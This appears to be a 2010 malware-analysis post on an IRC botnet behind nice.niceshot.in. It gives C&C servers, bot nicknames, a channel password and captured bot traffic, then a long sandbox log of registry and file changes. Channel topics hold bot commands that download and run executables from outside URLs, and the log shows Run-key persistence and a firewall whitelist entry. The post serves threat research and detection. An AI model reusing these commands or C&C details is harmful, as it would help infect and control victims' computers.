nice.niceshot.in

By Pig, November 12, 2010

nice.niceshot.in 67.202.108.14

C&C Server: 67.202.108.14:6567
Server Password:
Username: XP-5109
Nickname: [SI|DEU|00|P|07356]
Channel: #update# (Password: c1rc0dus0leil)
Channeltopic: :.updbin http://www.ahava.lt/ali.exe

Username: XP-1820
Nickname: [SI|DEU|00|P|47468]
Channel: #cricri# (Password: c1rc0dus0leil)
Channeltopic:

nice.niceshot.in 67.202.108.130

C&C Server: 67.202.108.130:6567
Server Password:
Username: XP-3473
Nickname: [SI|DEU|00|P|06553]
Channel: #csm# (Password: c1rc0dus0leil)
Channeltopic: :.austinupdate http://www.minka.com.pe/wp-includes/js/crap.exe

MODE [SI|USA|00|P|82252] -ix
JOIN #perurlz# c1rc0dus0leil
PRIVMSG #perurlz# :[Dl]: File download: 84.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_20070.exe @ 84.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|82252]
USER XP-0038 * 0 :COMPUTERNAME
NICK [SI|USA|00|P|35266]
USER XP-6943 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|35266] -ix
JOIN #csm# c1rc0dus0leil
PRIVMSG #csm# :[p2p]: File injected to peer2peer folders.

nice.niceshot.in 67.202.108.130
nice.niceshot.in 67.202.108.14

C&C Server: 67.202.108.130:6567
Server Password:
Username: XP-7539
Nickname: [SI|DEU|00|P|86123]
Channel: #all# (Password: c1rc0dus0leil)
Channeltopic: :-
C&C Server: 67.202.108.14:6567
Server Password:
Username: XP-8566
Nickname: [SI|DEU|00|P|00732]
Channel: #all# (Password: c1rc0dus0leil)
Channeltopic: :-

Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Ci Servs” = newbin.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “Ci Servs” = newbin.exe
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:dedicacion.exe” = c:dedicacion.exe:*:Enabled:Ci Servs
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “Guid” = 8aefce96-4618-42ff-a057-3536aa78233e
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetsh “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetsh “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetsh “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetshNapmontr “Guid” = 710adbf0-ce88-40b4-a50d-231ada6593f0
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftNAPNetshNapmontr “BitNames” = NAP_TRACE_BASE NAP_TRACE_NETSH
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagent “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagent “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagent “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagenttraceIdentifier “Guid” = b0278a28-76f1-4e15-b1df-14b209a12613
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftqagenttraceIdentifier “BitNames” = Error Unusual Info Debug
Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “InstallRoot”
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “CLRLoadLogDir”
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “OnlyUseLatestCLR”
HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Counter”
HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Help”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “EventLogLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “TotalInstanceName”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “DisplayHeapPerfObject”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ProcessNameFormat”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ThreadNameFormat”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Counter”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Help”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Counter”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Help”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf1”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf2”
HKEY_PERFORMANCE_DATA “230 784”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “CurrentBuildNumber”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging Directory”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Log File Max Size”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Repository Directory”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentLocalConfig “Enable Tracing”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentLocalConfig “Tracing Level”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Friendly Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Description”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Enabled”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Vendor Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Info Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Config Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Validator Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Registration Date”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79617 “Component Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Friendly Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Description”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Enabled”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Vendor Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Info Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Config Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Validator Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Registration Date”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79618 “Component Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Friendly Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Description”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Enabled”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Vendor Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Info Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Config Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Validator Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Registration Date”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79619 “Component Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Friendly Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Description”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Enabled”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Vendor Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Info Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Config Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Validator Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Registration Date”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79620 “Component Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Friendly Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Description”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Enabled”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Vendor Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Info Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Config Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Validator Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Registration Date”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79621 “Component Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Friendly Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Description”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Enabled”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Vendor Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Info Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Config Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Validator Clsid”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Registration Date”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs79623 “Component Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentLocalConfig “PlumbIpsecPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “ProcessID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “EnablePrivateObjectHeap”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “ContextLimit”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “ObjectLimit”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “IdentifierLimit”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “newbin.exe”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “InstallRoot”
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “CLRLoadLogDir”
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “OnlyUseLatestCLR”
HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Counter”
HKEY_LOCAL_MACHINESYSTEMControlSet001Services.NETFrameworkPerformance “First Help”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “EventLogLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “TotalInstanceName”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “DisplayHeapPerfObject”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ProcessNameFormat”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPerfProcPerformance “ThreadNameFormat”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Counter”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPSchedPerformance “First Help”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Counter”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRSVPPerformance “First Help”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf1”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionTelephony “Perf2”
HKEY_PERFORMANCE_DATA “230 784”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Sink Transmit Buffer Size”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “DefaultRpcStackSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “EnableObjectValidation”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Log File Max Size”
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C}InprocServer32 “ThreadingModel”
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C}InprocServer32 “Synchronization”
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C}InprocServer32 “”
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C} “”
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{D63A5850-8F16-11CF-9F47-00AA00BF345C} “AppId”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionHotFixKB956572 “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOMSecuredHostProviders “ROOTCIMV2:__Win32Provider.Name=”CIMWin32″”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWBEMCIMOM “Logging Directory”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “ProductName”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlProductOptions “ProductSuite”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “ProductId”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “RegisteredOwner”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “RegisteredOrganization”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “Plus! ProductId”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “CurrentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion “InstallDate”
HKEY_LOCAL_MACHINESYSTEMSetup “SystemPartition”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlPriorityControl “Win32PrioritySeparation”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSession ManagerMemory Management “LargeSystemCache”
HKEY_LOCAL_MACHINEHARDWAREDESCRIPTIONSystemCentralProcessor “ProcessorNameString”
HKEY_LOCAL_MACHINEHARDWAREDESCRIPTIONSystemCentralProcessor “Identifier”
“Counter”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “EventLogLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionPerflib “TotalInstanceName”
HKEY_PERFORMANCE_DATA “238”
Enums HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicyAppPatch
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicy
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesnapagentQecs
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicyAppPatch
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkPolicy

File Changes by all processes
New Files c:dedicacion.exe
DeviceTcp
DeviceIp
DeviceIp
DeviceGpc
DeviceTcp6
C:WINDOWSnewbin.exe
C:WINDOWSnewbin.exe
DeviceTcp
DeviceIp
DeviceIp
DeviceGpc
DeviceTcp6
DeviceRasAcd
Opened Files .Ip
c:dedicacion.exe.config
c:dedicacion.exe
.PIPEEVENTLOG
.PIPEROUTER
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:WINDOWSsystem32
C:WINDOWS
C:WINDOWSRegistrationR000000000007.clb
.PIPElsarpc
newbin.exe
.Ip
C:WINDOWSnewbin.exe.config
C:WINDOWSnewbin.exe
.PIPEEVENTLOG
.PIPEROUTER
.PIPElsarpc
c:autoexec.bat
.PIPElsarpc
.pipePIPE_EVENTROOT/CIMV2PROVIDERSUBSYSTEM
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSREPAIRSETUP.LOG
.PIPEwkssvc
.PIPEsrvsvc
Deleted Files
Chronological Order Create/Open File: c:dedicacion.exe (OPEN_ALWAYS)
Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
